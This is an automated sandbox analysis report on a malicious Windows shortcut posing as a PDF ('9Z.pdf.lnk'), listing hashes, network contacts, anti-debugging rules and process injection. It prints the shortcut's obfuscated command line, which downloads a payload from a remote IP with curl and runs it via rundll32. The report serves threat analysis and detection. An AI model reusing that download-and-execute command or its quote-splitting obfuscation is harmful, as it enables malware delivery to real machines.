Summary | ZeroBOX

9Z.pdf.lnk

Generic Malware UPX GIF Format Lnk Format PE64 PE File DLL OS Processor Check AntiVM AntiDebug
Category Machine Started Completed
FILE s1_win7_x6403_us Sept. 27, 2023, 10:52 a.m. Sept. 27, 2023, 10:54 a.m.
Size 2.1KB
Type MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Wed Oct 6 04:51:36 2021, mtime=Tue Sep 26 02:14:46 2023, atime=Wed Oct 6 04:51:36 2021, length=289792, window=hidenormalshowminimized
MD5 3d2651a982fff4f68e6cef1f94ce5ee4
SHA256 a56edeb6cbe2b16e449e4be28543b4d43fdb9cea8a602262eb5c3bf238d5d44b
CRC32 E52DB8ED
ssdeep 24:8aYUWJCnBc2LA8J8OIV+/r7KcazETexIis3i85RJ:8aY6iSZIk7KcazETexMd
Yara
  • Lnk_Format_Zero - LNK Format
  • lnk_file_format - Microsoft Windows Shortcut File Format
  • Generic_Malware_Zero - Generic Malware

Name Response Post-Analysis Lookup
skrgerona.com 104.21.57.237
IP Address Status Action
164.124.101.2 Active Moloch
172.67.193.129 Active Moloch
95.164.17.59 Active Moloch

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: 'doe9' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: doe9
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'E"Xi"t' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: Ping request could not find host doe9. Please check the name and try again.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Ping request could not find host doe9. Please check the name and try again.
console_handle: 0x00000007
1 1 0
suspicious_features Connection to IP address suspicious_request GET http://95.164.17.59/ZIbr7/L08
suspicious_features GET method with no useragent header suspicious_request GET http://skrgerona.com/
request GET http://95.164.17.59/ZIbr7/L08
request GET http://skrgerona.com/
file C:\Users\test22\AppData\Local\Temp\9Z.pdf.lnk
cmdline "C:\Windows\System32\cmd.exe" /c doe9 || eCHo doe9 & Pi"nG" doe9 || C"U"R"L" h"ttp"://"9"5.16"4"."1"7."5"9"/"Z"I"br"7/"L0"8" -o C:\Users\test22\AppData\Local\Temp\doe9.log & Pi"nG" -n 4 doe9 || rundll32 C:\Users\test22\AppData\Local\Temp\doe9.log scab /k besogon728 & E"Xi"t '=GaFTRUaPqc
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
host 95.164.17.59
Process injection Process 1648 resumed a thread in remote process 2152
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000002ec
suspend_count: 1
process_identifier: 2152
1 0 0